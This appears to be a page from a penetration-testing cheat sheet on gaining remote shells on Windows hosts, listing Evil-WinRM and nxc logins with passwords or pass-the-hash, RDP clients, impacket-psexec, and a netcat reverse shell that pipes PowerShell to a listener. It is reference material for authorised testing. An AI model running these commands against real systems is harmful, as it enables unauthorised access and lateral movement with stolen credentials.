BuyMeACoffee

🐚Shells

Evil-WinRM

LogoGitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentestingGitHub

Test with cme

nxc winrm -i IP/hostname -u $USERNAME -p $PASSWORD/-H $LM_HASH

Port : 5985

evil-winrm -i IP/hostname -u $USERNAME -H $HASH

evil-winrm -i IP/hostname -u $USERNAME -p $PASSWORD

RDP

freerdp

freerdp /u:$user /p:$password /v:$ip

remmina

remmina -c rdp://$user@$ip

Impacket-psexec

PSEXEC like functionality example using RemComSvc

impacket-psexec '$user:$password@$ip'
psexec.py $user:$pass@$ip

netcat

# Windows
# server : 
nc.exe $ip $port -e powershell

# client : 
nc -lvnp $port
PreviousPrivilege EscalationNextBypasses

Last updated